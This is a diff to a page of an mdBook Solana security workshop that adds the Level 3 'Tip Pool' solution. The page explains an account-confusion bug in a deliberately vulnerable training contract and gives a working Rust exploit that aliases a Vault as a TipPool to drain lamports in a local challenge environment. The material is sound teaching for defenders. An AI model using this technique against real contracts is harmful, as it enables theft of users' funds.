--- a/level3-solution.html
+++ b/level3-solution.html
@@ -3,7 +3,7 @@
     <head>
         <!-- Book generated using mdBook -->
         <meta charset="UTF-8">
-        <title>Introduction - Solana Security Workshop</title>
+        <title>Solution - Solana Security Workshop</title>
 
 
         <!-- Custom HTML head -->
@@ -81,7 +81,7 @@
 
         <nav id="sidebar" class="sidebar" aria-label="Table of contents">
             <div class="sidebar-scrollbox">
-                <ol class="chapter"><li class="chapter-item expanded "><a href="index.html" class="active"><strong aria-hidden="true">1.</strong> Introduction</a></li><li class="chapter-item expanded "><a href="workshop.html"><strong aria-hidden="true">2.</strong> Workshop</a></li><li class="chapter-item expanded "><a href="setup.html"><strong aria-hidden="true">3.</strong> Setup</a></li><li class="chapter-item expanded "><a href="poc_framework.html"><strong aria-hidden="true">4.</strong> PoC Framework</a></li><li class="chapter-item expanded "><a href="level0-solution.html"><strong aria-hidden="true">5.</strong> Level 0 - A first vulnerability Solution</a></li><li class="chapter-item expanded "><a href="level1.html"><strong aria-hidden="true">6.</strong> Level 1 - Personal Vault</a></li><li><ol class="section"><li class="chapter-item expanded "><a href="level1-hint1.html"><strong aria-hidden="true">6.1.</strong> Hint 1</a></li><li class="chapter-item expanded "><a href="level1-hint2.html"><strong aria-hidden="true">6.2.</strong> Hint 2</a></li><li class="chapter-item expanded "><a href="level1-bug.html"><strong aria-hidden="true">6.3.</strong> Bug</a></li><li class="chapter-item expanded "><a href="level1-solution.html"><strong aria-hidden="true">6.4.</strong> Solution</a></li></ol></li><li class="chapter-item expanded "><a href="level2.html"><strong aria-hidden="true">7.</strong> Level 2 - Secure Personal Vault</a></li><li><ol class="section"><li class="chapter-item expanded "><a href="level2-solution.html"><strong aria-hidden="true">7.1.</strong> Solution</a></li></ol></li><li class="chapter-item expanded "><a href="level3.html"><strong aria-hidden="true">8.</strong> Level 3 - Tip Pool</a></li><li><ol class="section"><li class="chapter-item expanded "><a href="level2-hint1.html"><strong aria-hidden="true">8.1.</strong> Hint 1</a></li><li class="chapter-item expanded "><a href="level2-hint2.html"><strong aria-hidden="true">8.2.</strong> Hint 2</a></li><li class="chapter-item expanded "><a href="level3-solution.html"><strong aria-hidden="true">8.3.</strong> Solution</a></li></ol></li><li class="chapter-item expanded "><a href="level4.html"><strong aria-hidden="true">9.</strong> Level 4 - SPL-Token Vault</a></li><li><ol class="section"><li class="chapter-item expanded "><a href="level4-hint1.html"><strong aria-hidden="true">9.1.</strong> Hint 1</a></li><li class="chapter-item expanded "><a href="level4-hint2.html"><strong aria-hidden="true">9.2.</strong> Hint 2</a></li><li class="chapter-item expanded "><a href="level4-hint3.html"><strong aria-hidden="true">9.3.</strong> Hint 3</a></li><li class="chapter-item expanded "><a href="level4-bug.html"><strong aria-hidden="true">9.4.</strong> Bug</a></li><li class="chapter-item expanded "><a href="level4-solution.html"><strong aria-hidden="true">9.5.</strong> Solution</a></li></ol></li><li class="chapter-item expanded "><a href="resources.html">Resources</a></li></ol>
+                <ol class="chapter"><li class="chapter-item expanded "><a href="index.html"><strong aria-hidden="true">1.</strong> Introduction</a></li><li class="chapter-item expanded "><a href="workshop.html"><strong aria-hidden="true">2.</strong> Workshop</a></li><li class="chapter-item expanded "><a href="setup.html"><strong aria-hidden="true">3.</strong> Setup</a></li><li class="chapter-item expanded "><a href="poc_framework.html"><strong aria-hidden="true">4.</strong> PoC Framework</a></li><li class="chapter-item expanded "><a href="level0-solution.html"><strong aria-hidden="true">5.</strong> Level 0 - A first vulnerability Solution</a></li><li class="chapter-item expanded "><a href="level1.html"><strong aria-hidden="true">6.</strong> Level 1 - Personal Vault</a></li><li><ol class="section"><li class="chapter-item expanded "><a href="level1-hint1.html"><strong aria-hidden="true">6.1.</strong> Hint 1</a></li><li class="chapter-item expanded "><a href="level1-hint2.html"><strong aria-hidden="true">6.2.</strong> Hint 2</a></li><li class="chapter-item expanded "><a href="level1-bug.html"><strong aria-hidden="true">6.3.</strong> Bug</a></li><li class="chapter-item expanded "><a href="level1-solution.html"><strong aria-hidden="true">6.4.</strong> Solution</a></li></ol></li><li class="chapter-item expanded "><a href="level2.html"><strong aria-hidden="true">7.</strong> Level 2 - Secure Personal Vault</a></li><li><ol class="section"><li class="chapter-item expanded "><a href="level2-solution.html"><strong aria-hidden="true">7.1.</strong> Solution</a></li></ol></li><li class="chapter-item expanded "><a href="level3.html"><strong aria-hidden="true">8.</strong> Level 3 - Tip Pool</a></li><li><ol class="section"><li class="chapter-item expanded "><a href="level2-hint1.html"><strong aria-hidden="true">8.1.</strong> Hint 1</a></li><li class="chapter-item expanded "><a href="level2-hint2.html"><strong aria-hidden="true">8.2.</strong> Hint 2</a></li><li class="chapter-item expanded "><a href="level3-solution.html" class="active"><strong aria-hidden="true">8.3.</strong> Solution</a></li></ol></li><li class="chapter-item expanded "><a href="level4.html"><strong aria-hidden="true">9.</strong> Level 4 - SPL-Token Vault</a></li><li><ol class="section"><li class="chapter-item expanded "><a href="level4-hint1.html"><strong aria-hidden="true">9.1.</strong> Hint 1</a></li><li class="chapter-item expanded "><a href="level4-hint2.html"><strong aria-hidden="true">9.2.</strong> Hint 2</a></li><li class="chapter-item expanded "><a href="level4-hint3.html"><strong aria-hidden="true">9.3.</strong> Hint 3</a></li><li class="chapter-item expanded "><a href="level4-bug.html"><strong aria-hidden="true">9.4.</strong> Bug</a></li><li class="chapter-item expanded "><a href="level4-solution.html"><strong aria-hidden="true">9.5.</strong> Solution</a></li></ol></li><li class="chapter-item expanded "><a href="resources.html">Resources</a></li></ol>
             </div>
             <div id="sidebar-resize-handle" class="sidebar-resize-handle"></div>
         </nav>
@@ -145,30 +145,75 @@
 
                 <div id="content" class="content">
                     <main>
-                        <h1 id="introduction"><a class="header" href="#introduction">Introduction</a></h1>
-<p>Welcome to the Solana Security Workshop!
-Here, we'll look at Solana Smart Contracts from an attacker's perspective.
-By learning how to find and exploit different types of issues, you'll be able to write more secure contracts as you'll know what to watch out for.</p>
-<p>In the first part of the course, we'll introduce concepts relevant to the security of Solana Contracts and explore one vulnerability in detail.
-After this part, we've prepared several smart contracts as challenges.
-Each of these will illustrate a different Solana smart contract bug.
-You're encouraged to work on exploiting these on your own. If you get stuck, please ask questions, we love to help. If you are attending remotely, this book will also provide some hints, which we recommend you read only if you don't progress yourself.</p>
-<p>Much code you'll see during this workshop is intentionally vulnerable. Even if the bugs are fixed, the code does not follow good design guidelines. Please do all of us a favor and not use it outside of security demonstrations.</p>
-<h2 id="requirements"><a class="header" href="#requirements">Requirements</a></h2>
-<p>To follow along with this course, you need to be familiar with writing solana contracts and the <a href="https://rust-lang.org/">Rust</a> programming language.</p>
-<p>You'll also need an environment where you can compile the example contracts and run the attacks.
-We have prepared remote environments if you need them, for details, see <a href="setup.html">Setup</a>.</p>
-<h2 id="who-we-are"><a class="header" href="#who-we-are">Who We Are</a></h2>
-<p>We started as a group of independent researchers, who love digging into complex concepts and projects. At the end of 2020 we have been introduced into the Solana ecosystem by looking at Solana-core code, in which we have found a number of vulnerabilities. We have since founded the security-research firm <a href="https://neodyme.io">Neodyme</a>, which has been helping the Solana Foundation with peer-reviews of smart contracts.</p>
-<p>As such, we have found lots of interesting and critical bugs in smart contracts.
-To help make the Ecosystem a more secure place, we want to share what we can in this short 3h workshop. We hope you enjoy breaking our prepared contracts as much as we do.</p>
+                        <h1 id="solution---account-confusion"><a class="header" href="#solution---account-confusion">Solution - Account confusion</a></h1>
+<p>The vulnerability in this contract is called account-confusion. Outside of the solana contract this type of vulnerability is called <em>type confusion</em>. It happens whenever data is misinterpreted. Programs often have to rely on a certain data structure, often a user can not control the data directly for a certain type, but for another one. If a program has a type confusion bug, it expects, that the data cannot be user controlled, but it fails to check the type, therefore a malicious attacker trick the program to use the controlled data instead. For example in this instance an attacker can initialize a second vault and use the withdraw instruction with the vault account as a pool account.</p>
+<p>In this case, we confuse a <code>TipPool</code> with a <code>Vault</code>. The fields will overlap nicely:</p>
+<pre><pre class="playground"><code class="language-rust">
+<span class="boring">#![allow(unused)]
+</span><span class="boring">fn main() {
+</span>pub struct TipPool {
+    pub withdraw_authority: Pubkey, // at the same position as Vault::creator
+    pub value: u64,                 // at the same position as Vault::fee
+    pub vault: Pubkey,              // at the same position as Vault::fee_recipient
+}
+
+pub struct Vault {
+    pub creator: Pubkey,
+    pub fee: f64,              
+    pub fee_recipient: Pubkey,
+    pub seed: u8,
+}
+<span class="boring">}
+</span></code></pre></pre>
+<p>Another thing that may be tricky to wrap your head around is that the program can be initialized twice, PDAs can be derived by a different seed result in different addresses, while in this case this is totally intended, there can be some cases, where not knowing this can lead to serious vulnerabilities.</p>
+<p>example solution by Felipe (author):</p>
+<pre><pre class="playground"><code class="language-rust">
+<span class="boring">#![allow(unused)]
+</span><span class="boring">fn main() {
+</span>fn hack(env: &amp;mut LocalEnvironment, challenge: &amp;Challenge) {
+    let seed: u8 = 1;
+    let hacker_vault_address =
+        Pubkey::create_program_address(&amp;[&amp;[seed]], &amp;challenge.tip_program).unwrap();
+
+    env.execute_as_transaction(
+        &amp;[level3::initialize(
+            challenge.tip_program,
+            hacker_vault_address,      // new vault's address
+            challenge.hacker.pubkey(), // initializer_address. Aliases with TipPool::withdraw_authority
+            seed,                      // seed != original seed, so we can create an account
+            2.0,                       // some fee. Aliases with TipPool::amount (note u64 != f64. Any value &gt;1.0 is a huge u64)
+            challenge.vault_address,   // fee_recipient. Aliases with TipPool::vault
+        )],
+        &amp;[&amp;challenge.hacker],
+    )
+    .print();
+
+    let amount = env.get_account(challenge.vault_address).unwrap().lamports;
+
+    env.execute_as_transaction(
+        &amp;[level3::withdraw(
+            challenge.tip_program,
+            challenge.vault_address,
+            hacker_vault_address,
+            challenge.hacker.pubkey(),
+            amount,
+        )],
+        &amp;[&amp;challenge.hacker],
+    )
+    .print();
+}
+<span class="boring">}
+</span></code></pre></pre>
 
                     </main>
 
                     <nav class="nav-wrapper" aria-label="Page navigation">
                         <!-- Mobile navigation buttons -->
+                            <a rel="prev" href="level2-hint2.html" class="mobile-nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left">
+                                <i class="fa fa-angle-left"></i>
+                            </a>
 
-                            <a rel="next" href="workshop.html" class="mobile-nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right">
+                            <a rel="next" href="level4.html" class="mobile-nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right">
                                 <i class="fa fa-angle-right"></i>
                             </a>
 
@@ -178,8 +223,11 @@ To help make the Ecosystem a more secure place, we want to share what we can in 
             </div>
 
             <nav class="nav-wide-wrapper" aria-label="Page navigation">
+                    <a rel="prev" href="level2-hint2.html" class="nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left">
+                        <i class="fa fa-angle-left"></i>
+                    </a>
 
-                    <a rel="next" href="workshop.html" class="nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right">
+                    <a rel="next" href="level4.html" class="nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right">
                         <i class="fa fa-angle-right"></i>
                     </a>
             </nav>
